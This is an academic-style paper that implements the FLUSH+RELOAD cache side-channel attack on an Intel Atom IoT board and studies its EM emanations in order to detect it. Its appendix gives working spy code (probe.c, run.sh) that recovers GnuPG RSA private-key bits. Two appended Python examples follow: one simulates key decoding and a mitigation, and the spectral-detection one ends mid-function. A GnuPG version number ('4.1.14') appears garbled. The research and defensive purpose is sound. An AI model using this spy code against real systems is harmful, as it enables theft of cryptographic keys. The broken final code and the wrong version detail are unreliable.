Analysis of EM Emanations from Cache Side-Channel Attacks on IoT Devices

Moumita Dey, School of Electrical and Computer Engineering, Georgia Institute of Technology, Atlanta, USA, [email protected]

Abstract— As the days go by, the number of IoT devices is growing exponentially, and because of their low computing capabilities they are being targeted to perform bigger attacks that compromise their security. With cache side channel attacks increasing on devices running on different platforms, it is important to take precautions beforehand so that a cache side channel attack performed on an IoT device can be detected. In this paper, the FLUSH+RELOAD attack, a popular cache side channel attack, is first implemented and a proof of concept is demonstrated on GnuPG RSA and on the bitcnts benchmark of the MiBench suite. Its effects are then observed through the EM emanations of the device under different conditions. Distinctive activity due to the FLUSH+RELOAD attack was observed, which can be identified by profiling the applications to be monitored.

INTRODUCTION

Fig. 1. IoT devices demand trend [1]

The Internet of Things (IoT) is the next frontier in technology, and there are already several companies trying to capitalize on it. It is a network of products that are connected to the Internet; they have their own IP addresses and can connect to each other to automate simple tasks. As prices fall and connectivity technology develops, more machines are going online. The appearance of smart objects is the main driver of the IoT industry's development. The number of connected IoT devices will increase to 25 billion by 2020 [1].

The true value of the Internet of Things does not lie in the lights turning on when the car reaches the driveway, but rather in the data that the connected devices collect about their users. The collection of data from devices will allow consumers, businesses and even entire connected cities to run more efficiently. However, collecting large amounts of data presents challenges. With the collection of data come major privacy and security concerns for consumers [2].

IoT devices usually run on low power and limited computing capabilities. Running anti-virus and malware-detection software takes up a lot of that computing power, which makes it difficult to monitor the security of IoT devices. Hence these devices are not being developed with security in mind, which leaves a lot of room for vulnerabilities. Attackers are fully aware of this reality and scan networks for vulnerable device connections [3].

Attacks on IoT devices are increasing every day. One such attack was the Mirai botnet. This particular botnet infected numerous IoT devices (primarily older routers and IP cameras), then used them to flood the DNS provider Dyn with a DDoS attack. The Mirai botnet took down Etsy, GitHub, Netflix, Shopify, SoundCloud, Spotify, Twitter, and a number of other major websites. This piece of malicious code took advantage of devices running out-of-date versions of the Linux kernel and relied on the fact that most users do not change the default usernames and passwords on their devices. Verizon Wireless released a report that included an unnamed university that saw more than 5,000 IoT devices attacked. When senior members of the campus IT staff started receiving numerous complaints about slow or inaccessible network connectivity, they discovered that their name servers were producing a high volume of alerts and showed an abnormal number of sub-domains related to seafood. It turned out that more than 5,000 discrete systems were making hundreds of DNS lookups every 15 minutes. The botnet spread via a brute force attack on weak passwords on IoT devices [4].

With side channel attacks gaining popularity on various computing platforms, generally trying to break the private keys of various cryptographic algorithms, it is only a matter of time before a cache side channel attack such as FLUSH+RELOAD, which extracts cryptographic keys from the information obtained from the memory access pattern, is performed on IoT devices, thereby compromising their security. This paper takes this as its motivation and proposes a solution to this IoT security problem, using the information obtained from the physical electromagnetic emanations of the IoT device.

This paper is organized as follows. First, the background required to understand the FLUSH+RELOAD attack, and the generation and extraction of EM emanations, is provided. In the next section, the implementation of the attack on the IoT device is discussed. In the third section, the experimental setup used to obtain the EM emanations is described. In the fourth section, the results of the attack are explained. Related work on the FLUSH+RELOAD attack is discussed in the fifth section. In the subsequent sections, the takeaways from this paper and the future work that can be built on its preliminary results are discussed.

I. BACKGROUND

A. CACHE SIDE CHANNEL ATTACKS

A side channel attack is an attack that tries to obtain information about the application of interest without changing the application's execution behavior. For example, timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information which can be exploited to break the system. General classes of side channel attacks include cache side channel attacks, timing attacks, power-monitoring attacks, electromagnetic attacks and so on. A cache attack is an attack based on the attacker's ability to monitor cache accesses made by the victim in a shared physical system, as in a virtualized environment or a type of cloud service [6]. The FLUSH+RELOAD attack is a type of cache side channel attack targeting x86 systems.

B. x86 MEMORY SYSTEM

Fig. 2. Typical CPU cache architecture [8]

In modern computer architectures, the cache is typically laid out in multiple levels, generally referred to as L1, L2 and so on, with each subsequent level larger than the lower levels, as shown in Fig. 2. In multi-core systems, the last level cache is generally shared among all the cores. On these architectures the caches are considered inclusive, meaning that whatever data is contained in a core's L1 cache will also be contained in the core's L2 and L3 caches. Consequently, flushing or evicting data from the last level cache also removes that data from all other cache levels of the processor.

To reduce the memory footprint of a system, the system software shares identical memory pages between processes running on the system [6]. When a process accesses a shared page in memory, the contents of the accessed memory location are cached.

With a page deduplication scheme, the operating system scans memory pages during idle CPU cycles and looks for pages that are identical in content. It collapses those pages into a single page that is then shared by all the processes that were accessing those identical pages. As a result of this page deduplication scheme, processes may be unknowingly or unintentionally sharing memory with one another. However, to prevent malicious access to the shared pages, the operating system maps shared pages as copy-on-write; that is, when a process wishes to write to a page, it must first make a local copy for itself that it can safely modify.

C. FLUSH+RELOAD

Retrieving data from memory, or from cache levels closer to memory, takes longer than retrieving it from cache levels closer to the core. This difference in timing has been exploited for side-channel attacks. Such attacks have been performed by interpreting the time difference based on the prior known state of the cache. FLUSH+RELOAD relies heavily on this time difference.

Another feature that FLUSH+RELOAD relies on is page sharing across processes, in this case the spy and the victim processes. With shared pages, the spy can ensure that a memory line has been evicted out of the entire cache hierarchy.

The entire attack is performed in three stages. In the first stage, the spy clears the line that is being monitored out of the entire cache. On Intel x86 systems, this is done using the special clflush instruction. clflush invalidates the cache line that contains the linear address specified by the source operand from all levels of the processor cache hierarchy (data and instruction) [7]. The invalidation is broadcast throughout the cache coherence domain. If, at any level of the cache hierarchy, the line is inconsistent with memory (dirty), it is written to memory before invalidation.

In the second stage, the spy waits for the victim to execute the application and perform accesses to the intended memory line. The wait period is decided by the attacker. If the wait period is too long, there might be multiple accesses to the same memory line that the spy identifies as a single memory access by the victim. If the wait time is too short, there is a higher risk of interrupting the victim while it is midway through performing its access to the memory line.

In the third stage, the spy reloads the memory line. The spy calculates the time difference between the third and the first stage. If, during the wait period, the victim accessed the memory line being monitored, the memory line will have been mapped into the cache when the spy tries to reload it. This means that the time difference will be smaller and will correspond to a cache hit. On the other hand, if the victim did not access the intended memory line, the spy will have to bring the memory line from main memory into the cache during the reload phase. Hence the time difference will be much larger than it would have been in the case of a cache hit. This time corresponds to a cache miss. This process continues for many accesses, and the spy keeps logging the values of the time difference. In this way, the spy tries to find out whether the victim accessed the memory line or not [6].

D. PHYSICAL EM SIDE CHANNEL

Electronic circuits within a system generate EM emanations as a side-effect of current flows. Since the current flows in the system can vary with program activity, these EM emanations often convey important information about program activity in the system. Most research work on EM emanations has focused on the risks they create as a side channel, i.e. as a way for attackers to extract sensitive data values (such as cryptographic keys) from the system, and on countermeasures against such attacks, primarily for smart-cards used for authentication and payments [9]. Beyond extracting sensitive data values, side-channel emanations have also been used to learn more about program behavior, e.g. to identify webpages during browsing or to find anomalies in software activity without attributing emanations to specific parts of the code.

Fig. 3. Spectrogram for Basicmath benchmark with large (profiling run) inputs [9]

The key insight in spectral profiling is that repetitive program activity (e.g. a loop) causes the unintentional EM signals to exhibit periodicity, i.e. the spectrum of these EM signals will have "spikes" at frequencies that correspond to the time spent in each repetition of the program activity, as illustrated in Fig. 3. Spectral profiling relies on training with known inputs to identify the spike frequencies that are characteristic of each loop. During profiling, Spectral Profiling monitors the spectrum in real time to identify when the spikes characteristic of each loop appear and disappear, allowing it to determine when each loop is entered and exited.

Spectral Profiling [9] monitors EM emanations unintentionally produced by the profiled system, looking for spectral spikes produced by periodic program activity (e.g. loops). This allows Spectral Profiling to determine which parts of the program have executed at what time. By analyzing the frequency and shape of the spectral spike, Spectral Profiling can obtain additional information such as the per-iteration execution time of a loop. The advantage of Spectral Profiling is that it can monitor a system as-is, without the instrumentation, system activity, etc. associated with the profiling itself, i.e. it completely eliminates the Observer's Effect and allows profiling of programs whose execution is performance-dependent and/or programs that run on even the simplest embedded systems that have no resources or support for profiling.

II. IMPLEMENTATION

The first part of this paper replicates the original work on the FLUSH+RELOAD attack in [6]. The original implementation extracted the private keys from the then latest GnuPG RSA implementation. This is implemented in this paper too, to show a proof of concept of the FLUSH+RELOAD attack on the IoT device. To extend this concept further, the FLUSH+RELOAD attack is demonstrated on the bitcnts application of the MiBench benchmark suite [10].

This section first explains the control flow of the GnuPG RSA implementation and of the bitcnts benchmark of the MiBench benchmark suite. It then explains the implementation of the FLUSH+RELOAD attack.

A. GnuPG RSA IMPLEMENTATION

Fig. 4. Exponentiation by Square and Multiply [6]

RSA [48] is a public-key cryptographic system that supports encryption and signing. Generating an encryption system requires the following steps:
• Randomly selecting two prime numbers p and q and calculating n = pq.
• Choosing a public exponent e. GnuPG uses e = 65537.
• Calculating a private exponent d = e^(-1) mod ((p−1)(q−1)).

The generated encryption system consists of:
• The public key is the pair (n; e).
• The private key is the triple (p; q; d).
• The encrypting function is E(m) = m^e mod n.
• The decrypting function is D(c) = c^d mod n.

Fig. 5. GnuPG 1.4.13's implementation of Square-and-Multiply

To compute the encryption and decryption functions, GnuPG versions before 4.1.14 and the related library before version 1.5.3 use the square-and-multiply exponentiation algorithm shown in Fig. 4. As can be seen from the implementation, computing the exponentiation consists of a sequence of Square and Multiply operations, each followed by a Modulo Reduce. This sequence corresponds directly with the bits of the exponent. Each occurrence of Square-Reduce-Multiply-Reduce within the sequence corresponds to a bit whose value is 1. Occurrences of Square-Reduce that are not followed by a Multiply correspond to bits whose value is 0. Consequently, a spy process that can trace the execution of the square-and-multiply exponentiation algorithm can recover the exponent.

The ideal probing addresses are the ones that are always executed when the targeted operations (mpih_sqr_n_basecase, mpihelp_divrem, and mpihelp_mul_karatsuba_case) are executed; these are the square, reduce and multiply functions respectively, as shown in Fig. 5.

B. MiBench bitcnts BENCHMARK

MiBench has many similarities to the EEMBC benchmark suite. It consists of six categories: Automotive and Industrial Control, Network, Security, Consumer Devices, Office Automation, and Telecommunications. These categories offer different program characteristics that enable researchers in architecture and compilers to examine their designs more effectively for a particular market segment [10].

The bit count algorithm tests the bit manipulation abilities of a processor by counting the number of bits in an array of integers. It does this using five methods, including an optimized 1-bit-per-loop counter, recursive bit count by nibbles, non-recursive bit count by nibbles using a table look-up, non-recursive bit count by bytes using a table look-up, and shift-and-count bits. The input data is an array of integers with equal numbers of 1s and 0s. In all, there are seven such function calls present. The addresses of bit_count (LOOP 1), ntbl_bitcnt (LOOP 3) and bit_shifter (LOOP 7) were probed to find out the order in which the loops are accessed.

C. THE ATTACK

The FLUSH+RELOAD attack was adapted from the probe function provided in the original paper.

First, the addresses to be probed for the selected application were determined by setting breakpoints with gdb on the desired lines. Three memory addresses, corresponding to their function calls, were stored in a text file. A script is run that starts the spy, which keeps probing the memory lines listed in the probe file at fixed intervals of time. After some time, the script invokes the application to run as another process on another core. Meanwhile the spy keeps probing the memory lines and keeps storing the timing information to an output file. After some time, the spy stops, once it has completed a set number of probe accesses.

Fig. 6. FLUSH+RELOAD spy function

The spy function is implemented as shown in Fig. 6. Before calling this function, the application binary is mapped, thus the spy creates pages corresponding to the application's source. The probe address offsets are added to the initial address of the mapping and the actual virtual addresses to be probed are generated. Thus, when the application is actually invoked by the script, since there already exists a copy of the pages, the processor performs page deduplication and both processes run from the same set of shared pages.

As can be seen from the spy function, for every iteration and for every probe address, a pointer to the probe address is passed to the probe timing function, which returns the time difference; this in turn is stored in an array that is later dumped to the output file. The spy then waits for a preset number of cycles specified by the user and continues the process.

Fig. 7. FLUSH+RELOAD probe timing function [6]

    int probe(char *adrs) {
        volatile unsigned long time;
        asm __volatile__(
            " mfence \n"
            " lfence \n"
            " rdtsc \n"
            " lfence \n"
            " movl %%eax, %%esi \n"
            " movl (%1), %%eax \n"
            " lfence \n"
            " rdtsc \n"
            " subl %%esi, %%eax \n"
            " clflush 0(%1) \n"
            : "=a" (time)
            : "c" (adrs)
            : "%esi", "%edx" );
        return time;
    }

The probe timing function in Fig. 7 is written in assembly to give more control over the timing and the instructions being executed. The assembly code takes one input, the address, which is stored in register %ecx. It returns the time taken to read this address in the register %eax, which is stored in the variable time. During the load, it reads 4 bytes from the memory address in %ecx, i.e. the address pointed to by adrs. To measure the time it takes to perform this read, the processor's time stamp counter is used. The rdtsc instruction reads the 64-bit counter, returning the low 32 bits of the counter in %eax and the high 32 bits in %edx. As the times measured are short, the 32 most significant bits in %edx are ignored. This counter value is then copied to %esi. After reading the memory, the time stamp counter is read again. It then subtracts the value of the counter before the memory read from the value after the read, leaving the result in the output register %eax.

The crux of the technique is the ability to evict specific memory lines from the cache. This is the function of the clflush instruction. The clflush instruction evicts the specified memory line from the whole cache hierarchy, including the L1 and L2 caches of all cores. Evicting the line from all cores ensures that the next time the victim accesses the memory line it will be loaded into L3.

The purpose of the mfence and lfence instructions is to serialize the instruction stream. The processor may execute instructions in parallel or out of order. Without serialization, instructions surrounding the measured code segment may be executed within that segment. The lfence instruction performs partial serialization. It ensures that load instructions preceding it have completed before it is executed and that no instruction following it executes before the lfence instruction. The mfence instruction orders all memory accesses, fence instructions and the clflush instruction. It is not, however, ordered with respect to other instructions and is, therefore, not sufficient to ensure ordering.

Finally, a minor change has been made. The original probe timing function output the result only if it was less than a threshold, which corresponded to the cache hit timing. Instead, we output all the time results obtained.

III. EXPERIMENTAL SETUP

The IoT device used for this paper is the MinnowBoard Turbot. It is a dual-core Intel Atom E3826 processor based device, with the cores fixed at 1.46 GHz for this specific work. It has a 32 KB 8-way L1 instruction cache and a 24 KB 6-way L1 data cache per core. It also has a 1 MB, 16-way L2 cache shared between the two cores, and 2 GB of DDR3L SDRAM [11]. The board runs Lubuntu [12], which is a fast and lightweight Ubuntu-based operating system. Lubuntu uses the minimal desktop LXDE and a selection of light applications, focusing on speed and energy-efficiency; because of this, Lubuntu has very low hardware requirements.

Fig. 8. MinnowBoard Turbot measurement setup

For the EM measurement, the setup was made as shown in Fig. 8. The measurements were taken using a spectrum analyzer.

IV. RESULTS

First, we look over the results of the proof of concept showing that the FLUSH+RELOAD attack is working. Next, we look at the EM effects it has on the IoT device.

A. TIMING ANALYSIS

Fig. 9. Timing plot of FLUSH+RELOAD on GnuPG RSA
Fig. 10. Zoomed timing plot of FLUSH+RELOAD on GnuPG RSA
Fig. 11. Zoomed timing plot of FLUSH+RELOAD on Bitcnts

Fig. 9 shows all the time differences obtained for the three functions for GnuPG RSA. There is a huge variation in the time slots, as some of them are memory accesses leading to very large access times, whereas the others are spread over the different levels of cache access. A small zoomed portion of this looks like Fig. 10. The patterns of the probe accesses have been labeled as S (Square), R (Reduce) and M (Multiply). The pattern SRMR corresponds to the bit 1 and the pattern SR without an MR corresponds to the bit 0. In this way, the bits can be recovered.

Fig. 11 shows the zoomed-in portion of the FLUSH+RELOAD attack on the bitcnts benchmark. The order of the loops identified has been labeled. Since the resolution of the loops is not as high as that of the RSA execution, some loops are missing, but the order is still maintained. Hence it can be confirmed that the FLUSH+RELOAD attack was successfully implemented.

B. EM ANALYSIS

Fig. 12. EM frequency spectrum from bitcnts
Fig. 13. EM frequency spectrum from GnuPG RSA
Fig. 14. EM frequency spectrum from GnuPG RSA - zoomed
Fig. 15. EM frequency spectrum from GnuPG RSA and bitcnts running simultaneously
Fig. 16. EM frequency spectrum from GnuPG RSA and bitcnts running simultaneously - zoomed in

In Fig. 12, the loops of interest have been labeled. The EM emanations with FLUSH+RELOAD show more activity around the center clock frequency. They also show some activity that becomes prominent after the application has finished executing.

In the case of RSA in Fig. 13, the sign and encrypt stages are clearly differentiable without probing, but with probing there is more activity and no clear differentiation between the encrypt and sign stages. There are also some loops seen during the application execution, and loops appear after RSA has executed, similar to the ones seen in Fig. 12. When zooming into the area closer to the clock, the loops from probing appear as shown in Fig. 14.

To show the effect of another application running in addition to the intended application, bitcnts was run simultaneously with RSA. In this case, Fig. 15, the sign and encrypt stages are not very clear due to the interference from bitcnts, but in the regions where the RSA signal is weaker the bitcnts loops are visible. However, when the FLUSH+RELOAD attack is also performed, and the frequencies around the clock are zoomed into as shown in Fig. 16, the loops from bitcnts and from probing can be distinguished.

V. RELATED WORK

There have been multiple attacks mainly aimed at extracting the private keys of various cryptographic algorithms. In the FLUSH+RELOAD paper, the attack was used to extract private encryption keys from a victim core running the GnuPG RSA implementation [6]. Cross-VM, cross-core attacks on various versions of GnuPG were performed in [13] using a FLUSH+RELOAD implementation. An attack on OpenSSL ECDSA in [14] was also performed using FLUSH+RELOAD. AES keys were also extracted using a cache side channel attack in [15]. Apart from cryptographic applications, the FLUSH+RELOAD attack has also been used to find the Wikipedia page being accessed in [16]. It has also been used in identifying the printed letters of a dot matrix printer in [17].

VI. CONCLUSIONS AND FUTURE WORK

In this paper, the FLUSH+RELOAD attack was implemented. The attack was first demonstrated on the original GnuPG RSA implementation and on the bitcnts benchmark of the MiBench benchmark suite. The EM emanations were then observed for three cases: bitcnts, RSA, and bitcnts+RSA, all with and without the FLUSH+RELOAD attack. It was seen that there was additional activity throughout, which was especially prominent near the clock. Even after the application was done with its execution, there were prominent loops present due to the continuous probing.

Since the outcomes of this paper are promising, the next steps are to develop a profiling and identification algorithm for the FLUSH+RELOAD attack on different applications using Spectral Profiling. It is suspected that the highly periodic spectrum is due to the repetitive probing for the entire duration of the application run. It will be interesting to see the effects of non-continuous probing, both on the effectiveness of the FLUSH+RELOAD attack and on its corresponding EM emanations.

ACKNOWLEDGMENT

The author would like to thank Prof Hyesoon Kim for providing the platform to explore this paper. The author would also like to thank her advisors Prof Milos Prvulovic and Prof Alenka Zajic for providing all the resources necessary to carry out this work.

REFERENCES

[1] Bernard Moon, SparkLabs Global Venture, https://www.slideshare.net/bernardmoon/internet-of-things-hardware-industry-report-2016, last accessed December 11, 2017.
[2] Hannah Becker, Technology Guide, http://www.technologyguide.com/feature/internet-of-things/, last accessed December 11, 2017.
[3] Robert Smith, News Service, http://www.newsbtc.com/2017/08/14/iot-importance-securing-smart-devices/, last accessed December 11, 2017.
[4] Jack Wallen, ZDNet, http://www.zdnet.com/article/5-nightmarish-attacks-that-show-the-risks-of-iot-security/, last accessed December 11, 2017.
[5] https://en.wikipedia.org/wiki/Side-channel_attack, last accessed December 11, 2017.
[6] Yarom, Yuval, and Katrina Falkner. "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack." USENIX Security Symposium, 2014.
[7] http://www.felixcloutier.com/x86/CLFLUSH.html, last accessed December 11, 2017.
[8] Gernot Heiser, microkerneldude, https://microkerneldude.wordpress.com/2015/04/27/how-to-steal-encryption-keys-your-cloud-is-not-as-secure-as-you-may-think/, last accessed December 11, 2017.
[9] Sehatbakhsh, Nader, Alireza Nazari, Alenka Zajic, and Milos Prvulovic. "Spectral profiling: Observer-effect-free profiling by monitoring EM emanations." In Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on, pp. 1-11. IEEE, 2016.
[10] Guthaus, Matthew R., Jeffrey S. Ringenberg, Dan Ernst, Todd M. Austin, Trevor Mudge, and Richard B. Brown. "MiBench: A free, commercially representative embedded benchmark suite." In Workload Characterization, 2001. WWC-4. 2001 IEEE International Workshop on, pp. 3-14. IEEE, 2001.
[11] minnowboard.org, https://minnowboard.org/minnowboard-turbot/technical-specs, last accessed December 12, 2017.
[12] lubuntu, http://lubuntu.net/, last accessed December 12, 2017.
[13] Liu, Fangfei, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. "Last-level cache side-channel attacks are practical." In Security and Privacy (SP), 2015 IEEE Symposium on, pp. 605-622. IEEE, 2015.
[14] Yarom, Yuval, and Naomi Benger. "Recovering OpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack." IACR Cryptology ePrint Archive 2014 (2014): 140.
[15] Osvik, Dag Arne, Adi Shamir, and Eran Tromer. "Cache attacks and countermeasures: the case of AES." In Cryptographers' Track at the RSA Conference, pp. 1-20. Springer, Berlin, Heidelberg, 2006.
[16] Hornby, Taylor. "Side-channel attacks on everyday applications: distinguishing inputs with FLUSH+RELOAD." (2017).
[17] Backes, Michael,  Markus Dürmuth, Sebastian Gerling, Manfred Pinkal, and Caroline Sporleder. "Acoustic Side-Channel Attacks on Printers." In USENIX Security Symposium, pp. 307-322. 2010.
[18] https://github.com/DanGe42/flush-reload, last accessed December 11, 2017.

APPENDIX

This section contains the code used for implementing the FLUSH+RELOAD attack. The code was improved from [18]. The files changed are listed below.

------ run.sh [script used for attack]

    #!/bin/sh
    set -o errexit
    set -o xtrace
    set -o nounset

    GPG=build_gpg/gnupg-1.4.12/bin/gpg
    ADDR=docs/addr/try1.txt
    MESSAGE=message.txt
    OUT=out.txt
    CYCLES=$1

    # Start the spy first so that it already holds the mapping of the GnuPG
    # binary when the victim starts (Section II.C).
    bin/probe "${GPG}" ${ADDR} ${OUT} "${CYCLES}" &
    PROBE_PID=$!
    sleep 0.01
    (echo "GPG start"; ${GPG} --yes --default-key minnow \
        --sign ${MESSAGE}; echo "GPG end") &
    GPG_PID=$!

    trap "echo 'Received signal'; \
        kill -TERM ${PROBE_PID} ${GPG_PID}" INT QUIT

    wait ${PROBE_PID}
    wait ${GPG_PID}

------ probe.c [main function]

    #include <stddef.h>
    #include <stdio.h>
    #include <sys/mman.h>

    /* struct args_st and read_args(), read_addrs(), cleanup_args() are
     * defined in the project's argument-handling source files [18], which
     * were not changed and are therefore not listed here. */

    #define MAX_NUM_OF_ADDRS 10u
    #define TIME_SLOTS 50000
    #define GPG_MAX_SIZE_BYTES 4194304
    #define PROBE_THRESHOLD 100ul

    /* Spin for `cycles` loop iterations between two probe rounds. */
    #define busy_wait(cycles) \
        for (volatile long i_ = 0; i_ != cycles; i_++) \
            ;

    /* Time one load of the line at adrs with rdtsc, then flush it again
     * so the next round starts from a cold cache (Fig. 7). */
    unsigned long probe_timing(char *adrs) {
        volatile unsigned long time;
        asm __volatile__(
            " mfence \n"
            " lfence \n"
            " rdtsc \n"
            " lfence \n"
            " movl %%eax, %%esi \n"
            " movl (%1), %%eax \n"
            " lfence \n"
            " rdtsc \n"
            " subl %%esi, %%eax \n"
            " clflush 0(%1) \n"
            : "=a" (time)
            : "c" (adrs)
            : "%esi", "%edx" );
        return time;
    }

    typedef struct {
        unsigned long result[MAX_NUM_OF_ADDRS];
    } time_slot;

    /* Probe every address once per time slot, then idle for busy_cycles
     * (the spy function of Fig. 6). */
    void spy(char **addrs, size_t num_addrs,
             time_slot *slots, size_t num_slots,
             int busy_cycles) {
        for (size_t slot = 0; slot < num_slots; slot++) {
            for (int addr = 0; addr < (int) num_addrs; addr++) {
                char *ptr = addrs[addr];
                unsigned long result = probe_timing(ptr);
                slots[slot].result[addr] = result;
            }
            busy_wait(busy_cycles);
        }
    }

    /* One line per (slot, address): "slot addr cycles". */
    void write_slots_to_file(size_t num_addrs,
                             time_slot *slots, size_t num_slots,
                             FILE *out_file) {
        for (size_t slot = 0; slot < num_slots; slot++) {
            for (size_t addr = 0; addr < num_addrs; addr++) {
                unsigned long result = slots[slot].result[addr];
                fprintf(out_file, "%zu %zu %lu\n", slot, addr, result);
            }
        }
    }

    /* Turn the file offsets read from the probe file into virtual
     * addresses inside the mapping of the GnuPG binary. */
    void offset_addresses(void *gpg_base, char **addrs, size_t num_addrs) {
        for (size_t i = 0; i < num_addrs; i++) {
            unsigned long ptr_offset = (unsigned long) gpg_base;
            char *adjusted_ptr = addrs[i] + ptr_offset;
            addrs[i] = adjusted_ptr;
        }
    }

    int main(int argc, char *argv[]) {
        struct args_st arguments;
        if (!read_args(&arguments, argc, argv)) {
            return 1;
        }

        /* Map the GnuPG binary read-only and shared, so that the spy and
         * the victim end up on the same physical pages (Section II.C). */
        size_t map_len = GPG_MAX_SIZE_BYTES;
        void *gpg_base = mmap(NULL, map_len, PROT_READ,
                              MAP_FILE | MAP_SHARED,
                              arguments.gpg_fd, 0);
        if (gpg_base == MAP_FAILED) {
            perror("mmap");
            return 1;
        }
        printf("GPG binary mmapped to %p\n", gpg_base);

        char *addrs[MAX_NUM_OF_ADDRS];
        size_t num_addrs = read_addrs(arguments.addr_file, addrs,
                                      MAX_NUM_OF_ADDRS);
        if (num_addrs == 0) {
            fprintf(stderr, "Did not read any addresses from file\n");
            return 0;
        }

        printf("Probing %zu addresses:\n", num_addrs);
        for (size_t i = 0; i < num_addrs; i++) {
            printf("%p\n", (void *) addrs[i]);
        }

        offset_addresses(gpg_base, addrs, num_addrs);
        printf("Here are the offset addresses (respectively):\n");
        for (size_t i = 0; i < num_addrs; i++) {
            printf("%p\n", (void *) addrs[i]);
        }

        printf("Started spying\n");
        time_slot slots[TIME_SLOTS];
        spy(addrs, num_addrs, slots, TIME_SLOTS, arguments.busy_cycles);
        printf("Finished spying\n");

        write_slots_to_file(num_addrs, slots, TIME_SLOTS, arguments.out_file);

        munmap(gpg_base, map_len);
        cleanup_args(&arguments);
        return 0;
    }
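The following is an added example; it is not code from the paper, from [6] or from [18]. It ties together Section II.A (the Square/Reduce/Multiply sequence of Fig. 4 mirrors the exponent bits), the appendix's "slot addr cycles" output format, and the Section IV.A decoding rule (SRMR is a 1, SR without MR is a 0), and then shows why a square-and-always-multiply variant produces the same operation sequence for every exponent, which is the control-flow property a defender wants from an exponentiation routine. Everything is simulated in Python on constructed inputs; no cache is probed. Two things are assumptions, not facts from the paper: that indices 0, 1, 2 in the probe file correspond to square, reduce and multiply, and that the 100-cycle hit threshold (PROBE_THRESHOLD in the appendix) separates hits from misses.

```python
"""Added example (not the paper's code): square-and-multiply leak,
probe-log decoding per Section IV.A, and a leak-free variant."""

NAMES = ("S", "R", "M")   # ASSUMED order of the three probed addresses
HIT_THRESHOLD = 100       # cycles; below this a reload counts as a cache hit


def square_and_multiply(base, exponent, modulus, trace):
    """Left-to-right square-and-multiply as in Fig. 4. Every bit costs a
    Square and a Reduce; only a 1 bit adds a Multiply and a Reduce, so the
    recorded operation sequence is the exponent's bit pattern."""
    result = 1
    for bit in bin(exponent)[2:]:            # most significant bit first
        result = result * result
        trace.append("S")
        result = result % modulus
        trace.append("R")
        if bit == "1":
            result = result * base
            trace.append("M")
            result = result % modulus
            trace.append("R")
    return result


def square_and_always_multiply(base, exponent, modulus, trace):
    """Mitigation sketch: the Multiply and its Reduce run for every bit and
    the product is discarded when the bit is 0, so the sequence of probed
    functions is identical for every exponent. (Real constant-time code
    must also avoid secret-dependent addresses and timing; this removes
    only the control-flow leak the paper exploits.)"""
    result = 1
    for bit in bin(exponent)[2:]:
        result = (result * result) % modulus
        trace.extend(["S", "R"])
        product = (result * base) % modulus
        trace.extend(["M", "R"])
        if bit == "1":                       # a selection, not a skipped call
            result = product
    return result


def labels_from_probe_log(lines, threshold=HIT_THRESHOLD, names=NAMES):
    """Parse write_slots_to_file() output ("slot addr cycles" per line).
    A probe under the threshold is a hit; consecutive slots hitting the
    same function are one long operation, so such runs are collapsed."""
    labels = []
    for line in lines:
        if not line.strip():
            continue
        slot, addr, cycles = (int(x) for x in line.split())
        if cycles < threshold:
            name = names[addr]
            if not labels or labels[-1] != name:
                labels.append(name)
    return labels


def decode_bits(labels):
    """Section IV.A rule: SRMR -> 1, SR not followed by MR -> 0."""
    bits, i = [], 0
    while i < len(labels):
        if labels[i:i + 2] != ["S", "R"]:
            raise ValueError("unexpected operation %r at %d" % (labels[i], i))
        i += 2
        if labels[i:i + 2] == ["M", "R"]:
            bits.append("1")
            i += 2
        else:
            bits.append("0")
    return int("".join(bits), 2)


def constructed_probe_log(hits_per_slot, names=NAMES):
    """Build a log in the appendix's format from a constructed list saying
    which probed function (if any) was hot in each slot. Hits read about
    60 cycles and misses about 240; both values are invented."""
    lines = []
    for slot, hit in enumerate(hits_per_slot):
        for addr, name in enumerate(names):
            cycles = 60 + slot % 5 if name == hit else 240 + slot % 7
            lines.append("%d %d %d" % (slot, addr, cycles))
    return lines


def demo():
    """A 5-bit exponent: leaky trace, a probe log built from it, the
    exponent decoded back from the log, and the leak-free trace."""
    exponent, base, modulus = 0b10110, 7, 1009
    leaky, fixed = [], []
    assert square_and_multiply(base, exponent, modulus, leaky) == pow(base, exponent, modulus)
    assert square_and_always_multiply(base, exponent, modulus, fixed) == pow(base, exponent, modulus)
    # Constructed spy view: a Square spans two slots, the other operations
    # one, and an idle slot separates consecutive victim calls.
    hits = []
    for op in leaky:
        hits.extend([op, op] if op == "S" else [op])
        hits.append(None)
    recovered = decode_bits(labels_from_probe_log(constructed_probe_log(hits)))
    return recovered, "".join(leaky), "".join(fixed)


if __name__ == "__main__":
    print(demo())
```

The leaky trace for exponent 10110 reads SRMR SR SRMR SRMR SR, which decodes straight back to the exponent, while the always-multiply trace is SRMR five times regardless of the key; a probe on the three function addresses of Fig. 5 would therefore see the same pattern for every signature.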
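As a second added example, again not the paper's code or data, the Spectral Profiling idea of Section I.D (a loop with period T puts a spike at 1/T in the spectrum) is applied to the observation of Sections IV.B and VI that continuous probing leaves loop spikes in place after the monitored application has finished. The signal is constructed and heavily simplified: a 1 kHz sample rate, a 50 Hz "application loop" active for the first 0.4 s and a 125 Hz "probing loop" active throughout are invented for illustration, not taken from the paper's spectrum-analyzer measurements around the 1.46 GHz clock. The detection rule it demonstrates is the one the paper's results suggest: loop activity that persists past the application's known run window does not belong to the application.

```python
"""Added example (not the paper's code): pure-Python spectral-spike
detection on a constructed emanation-like signal."""
import math
import random

FS = 1000.0  # constructed sample rate in Hz (not the paper's setup)


def constructed_emanation(duration_s, loops, noise=0.05, seed=7):
    """Sum of sinusoids, one per periodic activity, each active only on
    [start_s, end_s), plus small uniform noise. `loops` is a list of
    (frequency_hz, amplitude, start_s, end_s); all values are invented."""
    rng = random.Random(seed)
    samples = []
    for i in range(int(duration_s * FS)):
        t = i / FS
        value = rng.uniform(-noise, noise)
        for freq, amp, start, end in loops:
            if start <= t < end:
                value += amp * math.sin(2 * math.pi * freq * t)
        samples.append(value)
    return samples


def amplitude_spectrum(window):
    """Single-sided DFT amplitude; index k is frequency k * FS / len(window).
    A sinusoid of amplitude A sitting on an exact bin comes out as about A."""
    n = len(window)
    mags = []
    for k in range(n // 2):
        re = sum(x * math.cos(2 * math.pi * k * i / n) for i, x in enumerate(window))
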